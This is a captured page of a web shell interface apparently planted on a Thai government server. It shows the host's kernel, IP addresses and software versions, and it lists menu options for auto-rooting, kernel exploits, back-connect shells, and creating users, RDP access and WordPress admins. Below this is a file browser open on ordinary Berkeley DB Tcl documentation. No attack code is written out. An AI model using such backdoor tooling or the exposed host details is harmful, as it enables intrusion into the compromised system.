Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
db4-devel-4.7.25 /
api_tcl /
[ HOME SHELL ]
Name
Size
Permission
Action
api_tcl.html
4.98
KB
-rw-r--r--
db_close.html
3.01
KB
-rw-r--r--
db_count.html
1.76
KB
-rw-r--r--
db_cursor.html
2.12
KB
-rw-r--r--
db_del.html
2.37
KB
-rw-r--r--
db_get.html
5.22
KB
-rw-r--r--
db_get_join.html
2.16
KB
-rw-r--r--
db_get_type.html
1.58
KB
-rw-r--r--
db_is_byteswapped.html
1.83
KB
-rw-r--r--
db_join.html
2.26
KB
-rw-r--r--
db_open.html
18.9
KB
-rw-r--r--
db_put.html
3.7
KB
-rw-r--r--
db_remove.html
2.86
KB
-rw-r--r--
db_rename.html
2.82
KB
-rw-r--r--
db_stat.html
1.71
KB
-rw-r--r--
db_sync.html
1.66
KB
-rw-r--r--
db_truncate.html
2.01
KB
-rw-r--r--
dbc_close.html
1.67
KB
-rw-r--r--
dbc_del.html
1.74
KB
-rw-r--r--
dbc_dup.html
2.13
KB
-rw-r--r--
dbc_get.html
8.97
KB
-rw-r--r--
dbc_put.html
7.31
KB
-rw-r--r--
env_close.html
2
KB
-rw-r--r--
env_dbremove.html
2.17
KB
-rw-r--r--
env_dbrename.html
2.2
KB
-rw-r--r--
env_open.html
10.57
KB
-rw-r--r--
env_remove.html
3.79
KB
-rw-r--r--
txn.html
3.11
KB
-rw-r--r--
txn_abort.html
2.25
KB
-rw-r--r--
txn_checkpoint.html
2.03
KB
-rw-r--r--
txn_commit.html
3.46
KB
-rw-r--r--
version.html
1.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : db_stat.html
<!--$Id: db_stat.so,v 11.12 2002/08/18 21:17:27 bostic Exp $--> <!--$Id: m4.tcl,v 11.28 2004/12/16 19:13:05 bostic Exp $--> <!--Copyright (c) 1997,2008 Oracle. All rights reserved.--> <!--See the file LICENSE for redistribution information.--> <html> <head> <title>Berkeley DB: db stat</title> <meta name="description" content="Berkeley DB: An embedded database programmatic toolkit."> <meta name="keywords" content="embedded,database,programmatic,toolkit,btree,hash,hashing,transaction,transactions,locking,logging,access method,access methods,Java,C,C++"> </head> <body bgcolor=white> <table width="100%"><tr valign=top> <td> <b><i>db</i> <b>stat</b></b> </td> <td align=right> <a href="../../db4-devel-4.7.25/api_tcl/api_tcl.html"><img src="../../db4-devel-4.7.25/images/api.gif" alt="API"></a> <a href="../../db4-devel-4.7.25/ref/toc.html"><img src="../../db4-devel-4.7.25/images/ref.gif" alt="Ref"></a></td> </tr></table> <hr size=1 noshade> <tt> <b><pre>db stat [-faststat] </pre></b> <b>Description(db stat)</b> <p>The <i>db</i> <b>stat</b> command returns a list of name/value pairs comprising the statistics of the database.</p> <p>The options are as follows:</p> <br> <b>-faststat</b><ul compact><li>Return only that information which does not require a traversal of the database.</ul> <br> <p>In the case of error, a Tcl error is thrown.</p> </tt> <table width="100%"><tr><td><br></td><td align=right> <a href="../../db4-devel-4.7.25/api_tcl/api_tcl.html"><img src="../../db4-devel-4.7.25/images/api.gif" alt="API"></a><a href="../../db4-devel-4.7.25/ref/toc.html"><img src="../../db4-devel-4.7.25/images/ref.gif" alt="Ref"></a> </td></tr></table> <p><font size=1>Copyright (c) 1996,2008 Oracle. All rights reserved.</font> </body> </html>
Close